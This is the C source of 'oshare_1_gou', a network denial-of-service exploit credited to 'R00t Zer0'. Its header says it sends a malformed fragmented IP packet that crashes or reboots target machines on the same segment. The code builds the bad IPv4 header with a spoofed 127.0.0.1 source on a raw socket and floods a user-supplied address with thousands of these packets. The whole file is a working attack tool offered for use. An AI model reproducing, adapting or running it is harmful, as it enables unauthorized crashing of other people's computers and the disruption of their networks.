/****************************************************************************/
/*	[ oshare_1_gou  ver 0.1 ]  -- Dressing up No.1 --						*/
/*																			*/
/*																			*/
/*	 This program transmits the "oshare" packet which starts a machine aga-	*/
/*	in or crash. But, because it can't pass through the router, it can be 	*/
/*	carried out only in the same segment.									*/
/*	 "oshare packet" is (frag 39193:-4@65528+), If ihl and tot_len are cha-	*/
/*	nged, it has already tested that it becomes possible to kill Mac, too.	*/
/*	-----------------------------------------								*/
/*	Written by R00t Zer0													*/
/*	E-Mail  : defcon0@ugtop.com												*/
/*	Web URL : http://www.ugtop.com/defcon0/index.htm						*/
/****************************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/in_systm.h>
#include <arpa/inet.h>


u_short	in_cksum( u_short *, int );
int		send_oshare_packet( int, u_long );



u_short
in_cksum( u_short *addr, int len )
	{
	int		nleft	= len;
	u_short	*w		= addr;
	int		sum		= 0;
	u_short	answer	= 0;
	
	while( nleft > 1 )
		{
		sum += *w++;
		nleft -= 2;
		}
	
	if (nleft == 1)
		{
		*( u_char *)( &answer ) = *( u_char *)w;
		sum += answer;
		}
	
	sum	 = ( sum >> 16 ) + ( sum & 0xffff );
	sum += ( sum >> 16 );
	answer = ~sum;
	return( answer );
	}



int
send_oshare_packet( int sock_send, u_long dst_addr )
	{
	char	*packet;
	int		send_status;
	struct	iphdr		*ip;
	struct	sockaddr_in	to;
	
	packet	= ( char *)malloc( 40 );
	ip		= ( struct	iphdr *)( packet );
	memset( packet, 0, 40 );
	
	ip->version		= 4;
	ip->ihl			= 11;
	ip->tos			= 0x00;
	ip->tot_len		= htons( 44 );
	ip->id			= htons( 65535 );
	ip->frag_off	= htons( 16383 );
	ip->ttl			= 0xff;
	ip->protocol	= IPPROTO_UDP;
	ip->saddr		= htonl( inet_addr( "127.0.0.1" ) );
	ip->daddr		= dst_addr;
	ip->check		= in_cksum( ( u_short *)ip, 40 );
	
	to.sin_family			= AF_INET;
	to.sin_port				= htons( 0x123 );
	to.sin_addr.s_addr		= dst_addr;
	
	send_status = sendto( sock_send, packet, 40, 0,
	                     ( struct sockaddr *)&to, sizeof( struct sockaddr ) );
	
	free( packet );
	return( send_status );
	}



int
main( int argc, char *argv[] )
	{
	char	tmp_buffer[ 1024 ];
	int		loop, loop2;
	
	int		sock_send;
	u_long	src_addr, dst_addr;
	u_short	src_port, dst_port;
	
	struct	hostent		*host;
	struct	sockaddr_in	addr;
	
	time_t	t;
	
	if( argc != 3 )
		{
		printf( "Usage : %s <dst addr> <num(k)>\n", argv[0] );
		exit( -1 );
		}
	
	t = time( 0 );
	srand( ( u_int )t );
	
	
	memset( &addr, 0, sizeof( struct sockaddr_in ) );
	addr.sin_family			= AF_INET;
	addr.sin_addr.s_addr	= inet_addr( argv[1] );
	if( addr.sin_addr.s_addr == -1 )
		{
		host = gethostbyname( argv[1] );
		if( host == NULL )
			{
			printf( "Unknown host %s.\n", argv[1] );
			exit( -1 );
			}
		addr.sin_family = host->h_addrtype;
		memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length );
		}
	memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 );
	
	
	if( ( sock_send = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1)
		{
		perror( "Getting raw send socket" );
		exit( -1 );
		}
	
	
	printf( "\n\"Oshare Packet\" sending" );
	fflush( stdout );
	for( loop = 0; loop < atoi( argv[2] ); loop++ )
		{
		for( loop2 = 0; loop2 < 1000; loop2++ )
			send_oshare_packet( sock_send, dst_addr );
		fprintf( stderr, "." );
		fflush( stdout );
		}
	printf( "\n\nDone.\n\n" );
	fflush( stdout );
	
	close( sock_send );
	exit( 0 );
	}